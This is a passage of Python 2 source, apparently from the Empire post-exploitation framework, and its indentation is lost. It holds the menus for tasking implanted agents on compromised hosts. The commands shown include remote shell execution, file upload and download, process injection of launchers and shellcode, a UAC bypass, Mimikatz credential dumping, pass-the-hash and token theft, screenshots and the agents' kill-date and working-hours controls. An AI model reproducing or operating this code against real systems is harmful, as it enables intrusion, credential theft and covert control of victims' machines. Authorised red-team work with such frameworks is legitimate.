self.mainMenu.agents.add_agent_task_db(sessionID, 'TASK_SHELL', "Set-WorkingHours " + str(hours))
# update the agent log
msg = "Tasked agent to set working hours to %s" % (hours)
self.mainMenu.agents.save_agent_log(sessionID, msg)
print helpers.color("[!] Invalid agent name")
def do_remove(self, line):
"Remove one or more agents from the database."
name = line.strip()
if name.lower() == 'all':
choice = raw_input(helpers.color('[>] Remove all agents from the database? [y/N] ', 'red'))
if choice.lower() != '' and choice.lower()[0] == 'y':
except KeyboardInterrupt:
print ''
elif name.lower() == 'stale':
# remove 'stale' agents that have missed their checkin intervals
allAgents = self.mainMenu.agents.get_agents_db()
for agent in allAgents:
sessionID = agent['session_id']
# max check in -> delay + delay*jitter
intervalMax = (agent['delay'] + agent['delay'] * agent['jitter']) + 30
# get the agent last check in time
agentTime = time.mktime(time.strptime(agent['lastseen_time'], "%Y-%m-%d %H:%M:%S"))
if agentTime < time.mktime(time.localtime()) - intervalMax:
# if the last checkin time exceeds the limit, remove it
elif name.isdigit():
# if we're removing agents that checked in longer than X minutes ago
allAgents = self.mainMenu.agents.get_agents_db()
minutes = int(line.strip())
# grab just the agents active within the specified window (in minutes)
for agent in allAgents:
sessionID = agent['session_id']
# get the agent last check in time
agentTime = time.mktime(time.strptime(agent['lastseen_time'], "%Y-%m-%d %H:%M:%S"))
if agentTime < time.mktime(time.localtime()) - (int(minutes) * 60):
# if the last checkin time exceeds the limit, remove it
print helpers.color("[!] Please enter the minute window for agent checkin.")
# extract the sessionID and clear the agent tasking
sessionID = self.mainMenu.agents.get_agent_id_db(name)
if sessionID and len(sessionID) != 0:
print helpers.color("[!] Invalid agent name")
def do_usestager(self, line):
"Use an Empire stager."
parts = line.split(' ')
if parts[0] not in self.mainMenu.stagers.stagers:
print helpers.color("[!] Error: invalid stager module")
elif len(parts) == 1:
stager_menu = StagerMenu(self.mainMenu, parts[0])
elif len(parts) == 2:
listener = parts[1]
if not self.mainMenu.listeners.is_listener_valid(listener):
print helpers.color("[!] Please enter a valid listener name or ID")
self.mainMenu.stagers.set_stager_option('Listener', listener)
stager_menu = StagerMenu(self.mainMenu, parts[0])
print helpers.color("[!] Error in AgentsMenu's do_userstager()")
def do_usemodule(self, line):
"Use an Empire PowerShell module."
# Strip asterisks added by MainMenu.complete_usemodule()
module = line.strip().rstrip("*")
if module not in self.mainMenu.modules.modules:
print helpers.color("[!] Error: invalid module")
# set agent to "all"
module_menu = ModuleMenu(self.mainMenu, line, agent="all")
def do_searchmodule(self, line):
"Search Empire module names/descriptions."
searchTerm = line.strip()
if searchTerm.strip() == "":
print helpers.color("[!] Please enter a search term.")
def complete_interact(self, text, line, begidx, endidx):
"Tab-complete an interact command"
names = self.mainMenu.agents.get_agent_names_db()
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
def complete_rename(self, text, line, begidx, endidx):
"Tab-complete a rename command"
return self.complete_interact(text, line, begidx, endidx)
def complete_clear(self, text, line, begidx, endidx):
"Tab-complete a clear command"
names = self.mainMenu.agents.get_agent_names_db() + ["all", "autorun"]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
def complete_remove(self, text, line, begidx, endidx):
"Tab-complete a remove command"
names = self.mainMenu.agents.get_agent_names_db() + ["all", "stale"]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in names if s.startswith(mline)]
def complete_list(self, text, line, begidx, endidx):
"Tab-complete a list command"
options = ["stale"]
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in options if s.startswith(mline)]
def complete_kill(self, text, line, begidx, endidx):
"Tab-complete a kill command"
return self.complete_clear(text, line, begidx, endidx)
def complete_sleep(self, text, line, begidx, endidx):
"Tab-complete a sleep command"
return self.complete_clear(text, line, begidx, endidx)
def complete_lostlimit(self, text, line, begidx, endidx):
"Tab-complete a lostlimit command"
return self.complete_clear(text, line, begidx, endidx)
def complete_killdate(self, text, line, begidx, endidx):
"Tab-complete a killdate command"
return self.complete_clear(text, line, begidx, endidx)
def complete_workinghours(self, text, line, begidx, endidx):
"Tab-complete a workinghours command"
return self.complete_clear(text, line, begidx, endidx)
def complete_usemodule(self, text, line, begidx, endidx):
"Tab-complete an Empire PowerShell module path"
return self.mainMenu.complete_usemodule(text, line, begidx, endidx)
def complete_usestager(self, text, line, begidx, endidx):
"Tab-complete an Empire stager module path."
return self.mainMenu.complete_usestager(text, line, begidx, endidx)
def complete_creds(self, text, line, begidx, endidx):
"Tab-complete 'creds' commands."
return self.mainMenu.complete_creds(text, line, begidx, endidx)
class AgentMenu(SubMenu):
An abstracted class used by Empire to determine which agent menu type
to instantiate.
def __init__(self, mainMenu, sessionID):
agentLanguage = mainMenu.agents.get_language_db(sessionID)
if agentLanguage.lower() == 'powershell':
agent_menu = PowerShellAgentMenu(mainMenu, sessionID)
elif agentLanguage.lower() == 'python':
agent_menu = PythonAgentMenu(mainMenu, sessionID)
print helpers.color("[!] Agent language %s not recognized." % (agentLanguage))
class PowerShellAgentMenu(SubMenu):
The main class used by Empire to drive an individual 'agent' menu.
def __init__(self, mainMenu, sessionID):
SubMenu.__init__(self, mainMenu)
self.sessionID = sessionID
self.doc_header = 'Agent Commands'
# try to resolve the sessionID to a name
name = self.mainMenu.agents.get_agent_name_db(sessionID)
# set the text prompt
self.prompt = '(Empire: ' + helpers.color(name, 'red') + ') > '
# agent commands that have opsec-safe alises in the agent code
self.agentCommands = ['ls', 'dir', 'rm', 'del', 'cp', 'copy', 'pwd', 'cat', 'cd', 'mkdir', 'rmdir', 'mv', 'move', 'ipconfig', 'ifconfig', 'route', 'reboot', 'restart', 'shutdown', 'ps', 'tasklist', 'getpid', 'whoami', 'getuid', 'hostname']
# display any results from the database that were stored
# while we weren't interacting with the agent
results = self.mainMenu.agents.get_agent_results_db(self.sessionID)
if results:
print "\n" + results.rstrip('\r\n')
# listen for messages from this specific agent
dispatcher.connect(self.handle_agent_event, sender=dispatcher.Any)
# def preloop(self):
# traceback.print_stack()
def handle_agent_event(self, signal, sender):
Handle agent event signals.
if '[!] Agent' in signal and 'exiting' in signal:
name = self.mainMenu.agents.get_agent_name_db(self.sessionID)
if (str(self.sessionID) + " returned results" in signal) or (str(name) + " returned results" in signal):
# display any results returned by this agent that are returned
# while we are interacting with it, unless they are from the powershell keylogger
results = self.mainMenu.agents.get_agent_results_db(self.sessionID)
if results and not sender == "AgentsPsKeyLogger":
print "\n" + results
elif "[+] Part of file" in signal and "saved" in signal:
if (str(self.sessionID) in signal) or (str(name) in signal):
print helpers.color(signal)
def default(self, line):
"Default handler"
line = line.strip()
parts = line.split(' ')
if len(parts) > 0:
# check if we got an agent command
if parts[0] in self.agentCommands:
shellcmd = ' '.join(parts)
# task the agent with this shell command
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", shellcmd)
# update the agent log
msg = "Tasked agent to run command " + line
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
print helpers.color("[!] Command not recognized.")
print helpers.color("[*] Use 'help' or 'help agentcmds' to see available commands.")
def do_help(self, *args):
"Displays the help menu or syntax for particular commands."
if args[0].lower() == "agentcmds":
print "\n" + helpers.color("[*] Available opsec-safe agent commands:\n")
print " " + messages.wrap_columns(", ".join(self.agentCommands), ' ', width1=50, width2=10, indent=5) + "\n"
SubMenu.do_help(self, *args)
def do_list(self, line):
"Lists all active agents (or listeners)."
if line.lower().startswith("listeners"):
self.mainMenu.do_list("listeners " + str(' '.join(line.split(' ')[1:])))
elif line.lower().startswith("agents"):
self.mainMenu.do_list("agents " + str(' '.join(line.split(' ')[1:])))
print helpers.color("[!] Please use 'list [agents/listeners] <modifier>'.")
def do_rename(self, line):
"Rename the agent."
parts = line.strip().split(' ')
oldname = self.mainMenu.agents.get_agent_name_db(self.sessionID)
# name sure we get a new name to rename this agent
if len(parts) == 1 and parts[0].strip() != '':
# replace the old name with the new name
result = self.mainMenu.agents.rename_agent(oldname, parts[0])
if result:
self.prompt = "(Empire: " + helpers.color(parts[0], 'red') + ") > "
print helpers.color("[!] Please enter a new name for the agent")
def do_info(self, line):
"Display information about this agent"
# get the agent name, if applicable
agent = self.mainMenu.agents.get_agent_db(self.sessionID)
def do_exit(self, line):
"Task agent to exit."
choice = raw_input(helpers.color("[>] Task agent to exit? [y/N] ", "red"))
if choice.lower() == "y":
self.mainMenu.agents.add_agent_task_db(self.sessionID, 'TASK_EXIT')
# update the agent log
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to exit")
return True
except KeyboardInterrupt:
print ""
def do_clear(self, line):
"Clear out agent tasking."
def do_jobs(self, line):
"Return jobs or kill a running job."
parts = line.split(' ')
if len(parts) == 1:
if parts[0] == '':
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_GETJOBS")
# update the agent log
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to get running jobs")
print helpers.color("[!] Please use form 'jobs kill JOB_ID'")
elif len(parts) == 2:
jobID = parts[1].strip()
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_STOPJOB", jobID)
# update the agent log
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to stop job " + str(jobID))
def do_downloads(self, line):
"Return downloads or kill a download job"
parts = line.split(' ')
if len(parts) == 1:
if parts[0] == '':
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_GETDOWNLOADS")
#update the agent log
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to get downloads")
print helpers.color("[!] Please use for m 'downloads kill DOWNLOAD_ID'")
elif len(parts) == 2:
jobID = parts[1].strip()
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_STOPDOWNLOAD", jobID)
#update the agent log
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to stop download " + str(jobID))
def do_sleep(self, line):
"Task an agent to 'sleep interval [jitter]'"
parts = line.strip().split(' ')
if len(parts) > 0 and parts[0] != "":
delay = parts[0]
jitter = 0.0
if len(parts) == 2:
jitter = parts[1]
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db("delay", delay, self.sessionID)
self.mainMenu.agents.set_agent_field_db("jitter", jitter, self.sessionID)
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", "Set-Delay " + str(delay) + ' ' + str(jitter))
# update the agent log
msg = "Tasked agent to delay sleep/jitter " + str(delay) + "/" + str(jitter)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_lostlimit(self, line):
"Task an agent to change the limit on lost agent detection"
parts = line.strip().split(' ')
if len(parts) > 0 and parts[0] != "":
lostLimit = parts[0]
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db("lost_limit", lostLimit, self.sessionID)
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", "Set-LostLimit " + str(lostLimit))
# update the agent log
msg = "Tasked agent to change lost limit " + str(lostLimit)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_kill(self, line):
"Task an agent to kill a particular process name or ID."
parts = line.strip().split(' ')
process = parts[0]
if process == "":
print helpers.color("[!] Please enter a process name or ID.")
# if we were passed a process ID
if process.isdigit():
command = "Stop-Process " + str(process) + " -Force"
# otherwise assume we were passed a process name
# so grab all processes by this name and kill them
command = "Get-Process " + str(process) + " | %{Stop-Process $_.Id -Force}"
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", command)
msg = "Tasked agent to kill process: " + str(process)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_killdate(self, line):
"Get or set an agent's killdate (01/01/2016)."
parts = line.strip().split(' ')
date = parts[0]
if date == "":
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", "Get-KillDate")
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to get KillDate")
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db("kill_date", date, self.sessionID)
# task the agent
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", "Set-KillDate " + str(date))
# update the agent log
msg = "Tasked agent to set killdate to " + str(date)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_workinghours(self, line):
"Get or set an agent's working hours (9:00-17:00)."
parts = line.strip().split(' ')
hours = parts[0]
if hours == "":
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", "Get-WorkingHours")
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to get working hours")
hours = hours.replace(",", "-")
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db("working_hours", hours, self.sessionID)
# task the agent
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", "Set-WorkingHours " + str(hours))
# update the agent log
msg = "Tasked agent to set working hours to " + str(hours)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_shell(self, line):
"Task an agent to use a shell command."
line = line.strip()
if line != "":
# task the agent with this shell command
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", "shell " + str(line))
# update the agent log
msg = "Tasked agent to run shell command " + line
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_sysinfo(self, line):
"Task an agent to get system information."
# task the agent with this shell command
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SYSINFO")
# update the agent log
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to get system information")
def do_download(self, line):
"Task an agent to download a file."
line = line.strip()
if line != "":
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_DOWNLOAD", line)
# update the agent log
msg = "Tasked agent to download " + line
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_upload(self, line):
"Task an agent to upload a file."
# "upload /path/file.ext" or "upload /path/file/file.ext newfile.ext"
# absolute paths accepted
parts = line.strip().split(' ')
uploadname = ""
if len(parts) > 0 and parts[0] != "":
if len(parts) == 1:
# if we're uploading the file with its original name
uploadname = os.path.basename(parts[0])
# if we're uploading the file as a different name
uploadname = parts[1].strip()
if parts[0] != "" and os.path.exists(parts[0]):
# Check the file size against the upload limit of 1 mb
# read in the file and base64 encode it for transport
open_file = open(parts[0], 'r')
file_data = open_file.read()
size = os.path.getsize(parts[0])
if size > 1048576:
print helpers.color("[!] File size is too large. Upload limit is 1MB.")
# update the agent log with the filename and MD5
print helpers.color("[*] Size of %s for upload: %s" %(uploadname, helpers.get_file_size(file_data)), color="green")
msg = "Tasked agent to upload %s : %s" % (parts[0], hashlib.md5(file_data).hexdigest())
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
# upload packets -> "filename | script data"
file_data = helpers.encode_base64(file_data)
data = uploadname + "|" + file_data
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_UPLOAD", data)
print helpers.color("[!] Please enter a valid file path to upload")
def do_scriptimport(self, line):
"Imports a PowerShell script and keeps it in memory in the agent."
path = line.strip()
if path != "" and os.path.exists(path):
open_file = open(path, 'r')
script_data = open_file.read()
# strip out comments and blank lines from the imported script
script_data = helpers.strip_powershell_comments(script_data)
# task the agent to important the script
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SCRIPT_IMPORT", script_data)
# update the agent log with the filename and MD5
msg = "Tasked agent to import %s : %s" % (path, hashlib.md5(script_data).hexdigest())
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
# extract the functions from the script so we can tab-complete them
functions = helpers.parse_powershell_script(script_data)
# set this agent's tab-completable functions
self.mainMenu.agents.set_agent_functions_db(self.sessionID, functions)
print helpers.color("[!] Please enter a valid script path")
def do_scriptcmd(self, line):
"Execute a function in the currently imported PowerShell script."
command = line.strip()
if command != "":
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SCRIPT_COMMAND", command)
msg = "[*] Tasked agent %s to run %s" % (self.sessionID, command)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_usemodule(self, line):
"Use an Empire PowerShell module."
# Strip asterisks added by MainMenu.complete_usemodule()
module = "powershell/%s" %(line.strip().rstrip("*"))
if module not in self.mainMenu.modules.modules:
print helpers.color("[!] Error: invalid module")
module_menu = ModuleMenu(self.mainMenu, module, agent=self.sessionID)
def do_searchmodule(self, line):
"Search Empire module names/descriptions."
search_term = line.strip()
if search_term.strip() == "":
print helpers.color("[!] Please enter a search term.")
def do_updateprofile(self, line):
"Update an agent connection profile."
# profile format:
# TaskURI1,TaskURI2,...|UserAgent|OptionalHeader1,OptionalHeader2...
profile = line.strip().strip()
if profile != "":
# load up a profile from a file if a path was passed
if os.path.exists(profile):
open_file = open(profile, 'r')
profile = open_file.readlines()
# strip out profile comments and blank lines
profile = [l for l in profile if not l.startswith("#" and l.strip() != "")]
profile = profile[0]
if not profile.strip().startswith("\"/"):
print helpers.color("[!] Task URIs in profiles must start with / and be enclosed in quotes!")
updatecmd = "Update-Profile " + profile
# task the agent to update their profile
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", updatecmd)
# update the agent log
msg = "Tasked agent to update profile " + profile
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
print helpers.color("[*] Profile format is \"TaskURI1,TaskURI2,...|UserAgent|OptionalHeader2:Val1|OptionalHeader2:Val2...\"")
def do_psinject(self, line):
"Inject a launcher into a remote process. Ex. psinject <listener> <pid/process_name>"
# get the info for the psinject module
if line:
if self.mainMenu.modules.modules['powershell/management/psinject']:
module = self.mainMenu.modules.modules['powershell/management/psinject']
listenerID = line.split(' ')[0].strip()
module.options['Listener']['Value'] = listenerID
if listenerID != '' and self.mainMenu.listeners.is_listener_valid(listenerID):
if len(line.split(' ')) == 2:
target = line.split(' ')[1].strip()
if target.isdigit():
module.options['ProcId']['Value'] = target
module.options['ProcName']['Value'] = ''
module.options['ProcName']['Value'] = target
module.options['ProcId']['Value'] = ''
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
module_menu = ModuleMenu(self.mainMenu, 'powershell/management/psinject')
print helpers.color("[!] Please enter <listenerName> <pid>")
print helpers.color("[!] powershell/management/psinject module not loaded")
print helpers.color("[!] Injection requires you to specify listener")
def do_injectshellcode(self, line):
"Inject listener shellcode into a remote process. Ex. injectshellcode <meter_listener> <pid>"
# get the info for the inject module
if line:
listenerID = line.split(' ')[0].strip()
pid = ''
if len(line.split(' ')) == 2:
pid = line.split(' ')[1].strip()
if self.mainMenu.modules.modules['powershell/code_execution/invoke_shellcode']:
if listenerID != '' and self.mainMenu.listeners.is_listener_valid(listenerID):
module = self.mainMenu.modules.modules['powershell/code_execution/invoke_shellcode']
module.options['Listener']['Value'] = listenerID
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
if pid != '':
module.options['ProcessID']['Value'] = pid
module_menu = ModuleMenu(self.mainMenu, 'powershell/code_execution/invoke_shellcode')
print helpers.color("[!] Please enter <listenerName> <pid>")
print helpers.color("[!] powershell/code_execution/invoke_shellcode module not loaded")
print helpers.color("[!] Injection requires you to specify listener")
def do_sc(self, line):
"Takes a screenshot, default is PNG. Giving a ratio means using JPEG. Ex. sc [1-100]"
# get the info for the psinject module
if len(line.strip()) > 0:
# JPEG compression ratio
screenshot_ratio = str(int(line.strip()))
except Exception:
print helpers.color("[*] JPEG Ratio incorrect. Has been set to 80.")
screenshot_ratio = "80"
screenshot_ratio = ''
if self.mainMenu.modules.modules['powershell/collection/screenshot']:
module = self.mainMenu.modules.modules['powershell/collection/screenshot']
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
module.options['Ratio']['Value'] = screenshot_ratio
# execute the screenshot module
module_menu = ModuleMenu(self.mainMenu, 'powershell/collection/screenshot')
print helpers.color("[!] powershell/collection/screenshot module not loaded")
def do_spawn(self, line):
"Spawns a new Empire agent for the given listener name. Ex. spawn <listener>"
# get the info for the spawn module
if line:
listenerID = line.split(' ')[0].strip()
if listenerID != '' and self.mainMenu.listeners.is_listener_valid(listenerID):
# ensure the inject module is loaded
if self.mainMenu.modules.modules['powershell/management/spawn']:
module = self.mainMenu.modules.modules['powershell/management/spawn']
module.options['Listener']['Value'] = listenerID
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
# jump to the spawn module
module_menu = ModuleMenu(self.mainMenu, "powershell/management/spawn")
print helpers.color("[!] management/spawn module not loaded")
print helpers.color("[!] Please enter a valid listener name or ID.")
print helpers.color("[!] Please specify a listener name or ID.")
def do_bypassuac(self, line):
"Runs BypassUAC, spawning a new high-integrity agent for a listener. Ex. spawn <listener>"
# get the info for the bypassuac module
if line:
listenerID = line.split(' ')[0].strip()
if listenerID != '' and self.mainMenu.listeners.is_listener_valid(listenerID):
# ensure the inject module is loaded
if self.mainMenu.modules.modules['powershell/privesc/bypassuac_eventvwr']:
module = self.mainMenu.modules.modules['powershell/privesc/bypassuac_eventvwr']
module.options['Listener']['Value'] = listenerID
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
# jump to the spawn module
module_menu = ModuleMenu(self.mainMenu, 'powershell/privesc/bypassuac_eventvwr')
print helpers.color("[!] powershell/privesc/bypassuac_eventvwr module not loaded")
print helpers.color("[!] Please enter a valid listener name or ID.")
print helpers.color("[!] Please specify a listener name or ID.")
def do_mimikatz(self, line):
"Runs Invoke-Mimikatz on the client."
# ensure the credentials/mimiktaz/logonpasswords module is loaded
if self.mainMenu.modules.modules['powershell/credentials/mimikatz/logonpasswords']:
module = self.mainMenu.modules.modules['powershell/credentials/mimikatz/logonpasswords']
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
# execute the Mimikatz module
module_menu = ModuleMenu(self.mainMenu, 'powershell/credentials/mimikatz/logonpasswords')
def do_pth(self, line):
"Executes PTH for a CredID through Mimikatz."
credID = line.strip()
if credID == '':
print helpers.color("[!] Please specify a <CredID>.")
if self.mainMenu.modules.modules['powershell/credentials/mimikatz/pth']:
# reload the module to reset the default values
module = self.mainMenu.modules.reload_module('powershell/credentials/mimikatz/pth')
module = self.mainMenu.modules.modules['powershell/credentials/mimikatz/pth']
# set mimikt/pth to use the given CredID
module.options['CredID']['Value'] = credID
# set the agent ID
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
# execute the mimikatz/pth module
module_menu = ModuleMenu(self.mainMenu, 'powershell/credentials/mimikatz/pth')
def do_steal_token(self, line):
"Uses credentials/tokens to impersonate a token for a given process ID."
processID = line.strip()
if processID == '':
print helpers.color("[!] Please specify a process ID.")
if self.mainMenu.modules.modules['powershell/credentials/tokens']:
# reload the module to reset the default values
module = self.mainMenu.modules.reload_module('powershell/credentials/tokens')
module = self.mainMenu.modules.modules['powershell/credentials/tokens']
# set credentials/token to impersonate the given process ID token
module.options['ImpersonateUser']['Value'] = 'True'
module.options['ProcessID']['Value'] = processID
# set the agent ID
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
# execute the token module
module_menu = ModuleMenu(self.mainMenu, 'powershell/credentials/tokens')
# run a sysinfo to update
def do_revtoself(self, line):
"Uses credentials/tokens to revert token privileges."
if self.mainMenu.modules.modules['powershell/credentials/tokens']:
# reload the module to reset the default values
module = self.mainMenu.modules.reload_module('powershell/credentials/tokens')
module = self.mainMenu.modules.modules['powershell/credentials/tokens']
# set credentials/token to revert to self
module.options['RevToSelf']['Value'] = "True"
# set the agent ID
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
# execute the token module
module_menu = ModuleMenu(self.mainMenu, "powershell/credentials/tokens")
# run a sysinfo to update
def do_creds(self, line):
"Display/return credentials from the database."
def complete_psinject(self, text, line, begidx, endidx):
"Tab-complete psinject option values."
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in self.mainMenu.listeners.get_listener_names() if s.startswith(mline)]
def complete_injectshellcode(self, text, line, begidx, endidx):
"Tab-complete injectshellcode option values."
return self.complete_psinject(text, line, begidx, endidx)
def complete_spawn(self, text, line, begidx, endidx):
"Tab-complete spawn option values."
return self.complete_psinject(text, line, begidx, endidx)
def complete_bypassuac(self, text, line, begidx, endidx):
"Tab-complete bypassuac option values."
return self.complete_psinject(text, line, begidx, endidx)
def complete_jobs(self, text, line, begidx, endidx):
"Tab-complete jobs management options."
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in ["kill"] if s.startswith(mline)]
def complete_scriptimport(self, text, line, begidx, endidx):
"Tab-complete a PowerShell script path"
return helpers.complete_path(text, line)
def complete_scriptcmd(self, text, line, begidx, endidx):
"Tab-complete a script cmd set."
functions = self.mainMenu.agents.get_agent_functions(self.sessionID)
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in functions if s.startswith(mline)]
def complete_usemodule(self, text, line, begidx, endidx):
"Tab-complete an Empire PowerShell module path"
return self.mainMenu.complete_usemodule(text, line, begidx, endidx, language='powershell')
def complete_upload(self, text, line, begidx, endidx):
"Tab-complete an upload file path"
return helpers.complete_path(text, line)
def complete_updateprofile(self, text, line, begidx, endidx):
"Tab-complete an updateprofile path"
return helpers.complete_path(text, line)
def complete_creds(self, text, line, begidx, endidx):
"Tab-complete 'creds' commands."
return self.mainMenu.complete_creds(text, line, begidx, endidx)
class PythonAgentMenu(SubMenu):
def __init__(self, mainMenu, sessionID):
SubMenu.__init__(self, mainMenu)
self.sessionID = sessionID
self.doc_header = 'Agent Commands'
# try to resolve the sessionID to a name
name = self.mainMenu.agents.get_agent_name_db(sessionID)
# set the text prompt
self.prompt = '(Empire: ' + helpers.color(name, 'red') + ') > '
# listen for messages from this specific agent
dispatcher.connect(self.handle_agent_event, sender=dispatcher.Any)
# display any results from the database that were stored
# while we weren't interacting with the agent
results = self.mainMenu.agents.get_agent_results_db(self.sessionID)
if results:
print "\n" + results.rstrip('\r\n')
def handle_agent_event(self, signal, sender):
Handle agent event signals.
if "[!] Agent" in signal and "exiting" in signal: pass
name = self.mainMenu.agents.get_agent_name_db(self.sessionID)
if (str(self.sessionID) + ' returned results' in signal) or (str(name) + ' returned results' in signal):
# display any results returned by this agent that are returned
# while we are interacting with it
results = self.mainMenu.agents.get_agent_results_db(self.sessionID)
if results:
print "\n" + results
elif "[+] Part of file" in signal and "saved" in signal:
if (str(self.sessionID) in signal) or (str(name) in signal):
print helpers.color(signal)
def default(self, line):
"Default handler"
print helpers.color("[!] Command not recognized, use 'help' to see available commands")
def do_help(self, *args):
"Displays the help menu or syntax for particular commands."
SubMenu.do_help(self, *args)
def do_list(self, line):
"Lists all active agents (or listeners)."
if line.lower().startswith("listeners"):
self.mainMenu.do_list("listeners " + str(' '.join(line.split(' ')[1:])))
elif line.lower().startswith("agents"):
self.mainMenu.do_list("agents " + str(' '.join(line.split(' ')[1:])))
print helpers.color("[!] Please use 'list [agents/listeners] <modifier>'.")
def do_rename(self, line):
"Rename the agent."
parts = line.strip().split(' ')
oldname = self.mainMenu.agents.get_agent_name_db(self.sessionID)
# name sure we get a new name to rename this agent
if len(parts) == 1 and parts[0].strip() != '':
# replace the old name with the new name
result = self.mainMenu.agents.rename_agent(oldname, parts[0])
if result:
self.prompt = "(Empire: " + helpers.color(parts[0], 'red') + ") > "
print helpers.color("[!] Please enter a new name for the agent")
def do_info(self, line):
"Display information about this agent"
# get the agent name, if applicable
agent = self.mainMenu.agents.get_agent_db(self.sessionID)
def do_exit(self, line):
"Task agent to exit."
choice = raw_input(helpers.color("[>] Task agent to exit? [y/N] ", "red"))
if choice.lower() == "y":
self.mainMenu.agents.add_agent_task_db(self.sessionID, 'TASK_EXIT')
# update the agent log
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to exit")
return True
except KeyboardInterrupt as e:
print ""
def do_clear(self, line):
"Clear out agent tasking."
def do_cd(self, line):
"Change an agent's active directory"
line = line.strip()
if line != "":
# have to be careful with inline python and no threading
# this can cause the agent to crash so we will use try / cath
# task the agent with this shell command
if line == "..":
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", 'import os; os.chdir(os.pardir); print "Directory stepped down: %s"' % (line))
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", 'import os; os.chdir("%s"); print "Directory changed to: %s"' % (line, line))
# update the agent log
msg = "Tasked agent to change active directory to: %s" % (line)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_jobs(self, line):
"Return jobs or kill a running job."
parts = line.split(' ')
if len(parts) == 1:
if parts[0] == '':
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_GETJOBS")
# update the agent log
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to get running jobs")
print helpers.color("[!] Please use form 'jobs kill JOB_ID'")
elif len(parts) == 2:
jobID = parts[1].strip()
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_STOPJOB", jobID)
# update the agent log
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to stop job " + str(jobID))
def do_sleep(self, line):
"Task an agent to 'sleep interval [jitter]'"
parts = line.strip().split(' ')
delay = parts[0]
# make sure we pass a int()
if len(parts) >= 1:
print helpers.color("[!] Please only enter integer for 'interval'")
if len(parts) > 1:
print helpers.color("[!] Please only enter integer for '[jitter]'")
if delay == "":
# task the agent to display the delay/jitter
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", "global delay; global jitter; print 'delay/jitter = ' + str(delay)+'/'+str(jitter)")
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to display delay/jitter")
elif len(parts) > 0 and parts[0] != "":
delay = parts[0]
jitter = 0.0
if len(parts) == 2:
jitter = parts[1]
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db("delay", delay, self.sessionID)
